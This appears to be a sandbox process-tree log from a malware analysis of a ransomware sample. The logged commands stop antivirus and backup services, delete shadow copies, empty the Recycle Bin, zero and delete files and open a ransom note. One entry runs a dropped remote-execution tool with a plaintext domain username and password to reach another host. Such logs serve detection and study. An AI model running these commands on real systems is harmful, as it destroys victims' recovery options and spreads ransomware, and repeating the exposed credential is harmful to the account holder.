-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5544
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:5488
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:4940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:5244
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5912
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:5176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5756
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:5324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:6052
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:5424
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:5520
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5956
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:6212
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:6220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6472
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5288
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:6112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:5076
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:4896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:6024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:6952
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:6276
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:4156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:7024
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:7016
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:6292
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:6660
-
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6164
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:6188
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:6180
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6156
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6148
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5608
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5024
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2412
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6060
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2400
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4248
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2228
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4648
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4472
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5224
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6032
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5192
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6120
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:6092
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:5412
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4916
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:5588
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:6000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5948
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5820
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5888
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11 /USER:SHJPOLICE\amer !Omar20122⤵PID:4024
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5068
-
-
-
C:\Users\Admin\AppData\Local\Temp\lux2okcs.exe"C:\Users\Admin\AppData\Local\Temp\lux2okcs.exe" \10.10.0.11 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe2⤵
- Executes dropped EXE
PID:5684
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:5468
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:5036
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:6964
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:248
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:6716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.sample.exe2⤵PID:6544
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:272
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:5856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:5576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:4568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:6824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:5672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:5096
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5396